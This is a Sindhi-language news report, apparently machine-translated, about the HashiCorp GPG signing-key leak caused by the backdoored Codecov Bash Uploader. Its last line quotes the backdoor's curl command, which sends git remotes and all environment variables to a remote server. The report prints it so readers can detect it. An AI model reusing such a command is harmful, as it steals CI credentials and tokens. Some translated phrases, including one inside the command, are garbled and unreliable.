HashiCorp، اوپن سورس ٽولز جي ترقي لاءِ ڄاتل سڃاتل آهي Vagrant، Packer، Nomad ۽ Terraform، پرائيويٽ GPG Key جي ليڪ جو اعلان ڪيو جيڪو ڊجيٽل دستخط ٺاهڻ لاءِ استعمال ڪيو ويو جيڪو رليز جي تصديق ڪري ٿو. حملو ڪندڙ جيڪي GPG ڪيچ تائين رسائي حاصل ڪري سگھن ٿا ممڪن طور تي HashiCorp پروڊڪٽس ۾ پوشیدہ تبديليون ڪري سگھن ٿيون انھن کي صحيح ڊجيٽل دستخط سان تصديق ڪندي. ساڳئي وقت، ڪمپني جو چوڻ آهي ته آڊٽ دوران، اهڙيون ترميمون ڪرڻ جي ڪوششن جي نشاندهي نه ڪئي وئي.
سمجھوتي ٿيل GPG ڪي هاڻي رد ڪئي وئي آهي ۽ هڪ نئين ڪي سان تبديل ڪئي وئي آهي. مسئلو صرف SHA256SUM ۽ SHA256SUM.sig فائلن جي استعمال جي تصديق کي متاثر ڪيو ۽ ڊجيٽل دستخطن جي پيداوار کي متاثر نه ڪيو. Linux-DEB ۽ RPM پيڪيجز releases.hashicorp.com ذريعي پهچايا ويا، انهي سان گڏ رليز جي منظوري جا طريقا macOS и Windows (مستند ڪوڊ).
اهو ليڪ انفراسٽرڪچر اندر ڪوڊيڪوف بيش اپلوڊر (ڪوڊيڪووف-بيش) اسڪرپٽ جي استعمال جي ڪري ٿيو، جيڪو مسلسل انٽيگريشن سسٽم مان ڪوريج رپورٽون ڊائون لوڊ ڪرڻ لاءِ ٺاهيو ويو آهي. ڪوڊيڪوف تي حملي دوران، اسڪرپٽ ۾ هڪ پوئين دروازو ڳجهي طور تي داخل ڪيو ويو هو، جيڪو پاسورڊ ۽ انڪرپشن ڪيز موڪلڻ لاءِ استعمال ڪيو ويندو هو. سرور مداخلت ڪندڙ.
هيڪ ڪرڻ لاءِ، حملي ڪندڙن ڪوڊڪوف ڊاڪر جي تصوير ٺاهڻ جي عمل ۾ هڪ غلطي جو فائدو ورتو، جنهن کين GCS (گوگل ڪلائوڊ اسٽوريج) تائين پهچ واري ڊيٽا ڪڍڻ جي اجازت ڏني، جيڪا ڪوڊڪوف. ويب سائيٽ. تبديليون 31 جنوري تي واپس ڪيون ويون، ٻن مهينن تائين اڻڄاتل رهيون ۽ حملي ڪندڙن کي اجازت ڏني وئي ته صارف جي مسلسل انضمام واري نظام جي ماحول ۾ محفوظ ڪيل معلومات ڪڍي. شامل ڪيل بدسلوڪي ڪوڊ استعمال ڪندي، حملو ڪندڙ آزمائشي Git مخزن ۽ سڀني ماحوليات جي متغير بابت معلومات حاصل ڪري سگھن ٿا، بشمول ٽوڪن، انڪريپشن ڪيز ۽ پاسورڊ مسلسل انٽيگريشن سسٽم ڏانهن منتقل ٿيل ايپليڪيشن ڪوڊ، مخزن ۽ خدمتن جهڙوڪ Amazon Web Services ۽ GitHub تائين رسائي کي منظم ڪرڻ لاءِ.
سڌي ڪال کان علاوه، Codecov Bash Uploader اسڪرپٽ استعمال ڪيو ويو ٻين اپلوڊرن جي حصي طور، جهڙوڪ Codecov-action (Github)، Codecov-circleci-orb ۽ Codecov-bitrise-step، جن جا صارف پڻ متاثر ٿيا آهن. codecov-bash ۽ لاڳاپيل پراڊڪٽس جي سڀني صارفين کي انهن جي انفراسٽرڪچر جي آڊٽ ڪرڻ جي صلاح ڏني وئي آهي، انهي سان گڏ پاس ورڊ ۽ انڪرپشن ڪيز کي تبديل ڪريو. توهان اسڪرپٽ ۾ پٺئين دروازي جي موجودگي کي چيڪ ڪري سگهو ٿا لائن curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /upload/v2 || سچو
جو ذريعو: opennet.ru
